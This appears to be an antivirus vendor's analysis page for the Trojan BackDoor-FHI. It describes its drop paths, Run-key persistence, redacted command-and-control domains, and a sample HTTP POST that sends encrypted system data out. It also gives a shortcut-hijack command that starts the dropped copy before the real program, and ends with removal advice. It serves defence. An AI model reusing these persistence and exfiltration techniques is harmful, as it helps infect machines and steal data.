BackDoor-FHI

This page shows details and results of our analysis on the malware BackDoor-FHI

Overview

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases:

  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA


Minimum Engine

5600.1067

File Length

Varies

Description Added

2012-08-03

Description Modified

2012-08-29

Malware Proliferation

Characteristics

Upon execution, the Trojan drops itself to the following path.
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI will likewise drop copies of itself in random areas as thumbs.db[random character].

The following registry keys has been added to the system to allow it to automatically execute at startup:

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[Random]\ [random].exe /r

The Trojan injects its own code in many random processes, and tries to connect to the following malicious hosts.

  • www.g[Removed]ard.su
  • www.pro[Removed]ection.su
  • www.e[Removed]statics.cc
  • so[Removed]esytems.cc
  • www-pro[Removed]ection.su
  • esto[Removed]e-main.su

Notes: The above mentioned URLs might change depending on geographical locations where malicious content is executed.

The malware posts some encrypted system information data to the sites above.

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: e-statistics.cc
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...

The malware may also add or infect current document lnk files using a format similar to the below:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

The malware will then open the copy prior to opening the original target.

This Trojan is designed to download the malicious contents from websites and infect the comprised system.

Symptoms

Presence of above mentioned activities.

Method of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

Removal

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Variants